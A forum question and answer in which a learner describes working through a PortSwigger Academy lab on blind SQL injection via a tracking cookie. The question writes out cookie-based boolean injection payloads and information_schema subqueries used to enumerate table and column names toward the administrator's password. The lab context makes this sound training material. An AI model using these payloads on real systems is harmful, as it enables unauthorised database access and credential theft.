# Blind SQLi - guessing column name

Tags: sql-injection, mysql

I am learning Blind SQLi with Port Swigger Academy but I am stuck on this lab: https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses.

In this lab I have to get the user 'administrator' password from the table: 'users', columns: 'username','password' using blind SQLi located in a cookie. I can discover the table name 'users' and column 'username' but I can not discover the column 'password'

My steps are as follows:

1. Check if SQL occurs in the cookie by modifying cookie: `Cookie: TrackingId=abcdefghijk' AND '1'='1` and I have got a response "Welcome back!". When cookie: `Cookie: TrackingId=abcdefghijk' AND '1'='2` there is no "Welcome back!" announcement. So there is SQLi
2. Check table name. `' AND (SELECT table_name FROM information_schema.tables LIMIT 1) > 'u` if true ('Welcome back!) I am trying the next letter a -> b -> c if false I move to next letter position ua -> ub -> uc and so on . I guessed that table name `users` exists. I know that I can just try `' AND (SELECT 'a' FROM users LIMIT 1) = 'a` but it's a pure guess
3. Now is the hard part for me, check column name. `' AND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) > 'u`. The same method as above letter by letter but there is something wrong because:

   - `AND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) > 'use`  return true
   - `AND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) > 'usz`  return false
   - `AND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) > 'username`  return false
   - `AND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) = 'username` return true
   - `AND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) > 'password` return true
   - `AND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) = 'password` return false
   - `AND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) > 'aaaaaaaaaaaaaaa` return true
   - `AND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) > 'z` return false.

I do not understand this. If 'use' is true and 'usz' is false why then is 'password' true? Letter 's' is higher than 'e' so it should be false.
I can not imagine the answer of this query. If query answer is 'username' how do you guess the second column 'password'? I tried to change LIMIT but that does not work.

Answer (score 0):

The "limit" clause will return the first row, but it will not be predictable which row it will return.  So your subquery is returning a single randome (more accurately - difficult to predict) column.  You may want to consider moving your where clauses inside the subquery.